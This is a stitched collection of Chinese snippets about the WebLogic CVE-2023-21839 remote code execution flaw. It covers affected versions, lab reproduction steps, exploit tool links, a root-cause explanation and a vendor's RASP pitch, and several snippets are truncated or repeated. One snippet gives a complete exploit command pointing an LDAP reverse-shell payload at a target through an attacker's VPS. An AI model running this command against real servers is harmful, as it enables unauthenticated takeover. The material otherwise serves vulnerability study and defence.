WebLogic_Server = 14.1.1.0.0 0x02 漏洞复现 (1)通过nmap探测开放端口7001端口:且使用T3协议: (2)访问console目录,发现存在后台:http://x.x.x.x:7001/console/login/LoginForm.jsp (3)使用网上开源的工具进行漏洞探测:dnslog(开源工具链接:https://github.com/4ra1n/CVE-2023-21839) 本机需要安装好go的...
cd weblogic //进入weblogic文件夹 cd CVE-2023-21839 //进入CVE-2023-21839漏洞文件夹 docker-compose up -d //开启漏洞环境,拉取镜像 docker ps //查看当前docker运行情况,可以看到该漏洞环境已经开启 访问http://your-ip:7001/console,可以看到登录界面 漏洞复现 漏洞解析: ForeignOpaqueReference是OpaqueRefe...
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。 影响范围 ...
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。影响范...
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。 影响版本 WebLogic_Server = 12.2.1.3.0 ...
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。 影响版本 WebLogic_Server = 12.2.1.3.0 ...
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。 影响版本 WebLogic_Server = 12.2.1.3.0 ...
## 漏洞复现 ```java -jar .\Weblogic-CVE-2023-21839.jar xx.xx.xx.xx:7001 ldap://vps:1389/Basic/ReverseShell/vps/7879```工具下载链接https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839 还有一个工具无须依赖java下载链接:https://github.com/4ra1n/CVE-2023-21...
CVE-2023-21839是在反序列化过程中没有进行恶意操作,在完成反序列化过程后执行了漏洞类ForeignOpaqueReference中getReferent()方法中的lookup()才触发的漏洞。 其中,Context的lookup方法是用来查找指定名称的对象的,它接受一个字符串参数,返回一个Object对象,如果没有找到指定名称的对象,则返回null,我们则利用此点触发反...
攻击者通过retVal=context.lookup(evalMacros(this.remoteJNDIName))执行攻击,RASP探针则会在进行lookup查找时触发拦截。云鲨方案通过使用云鲨RASP,无需额外配置规则,就能实现对CVE-2023-21839漏洞的天然免疫防护。云鲨RASP帮助企业构建应用安全保护体系,搭建应用安全研运闭环,将积极防御能力注入业务应用中...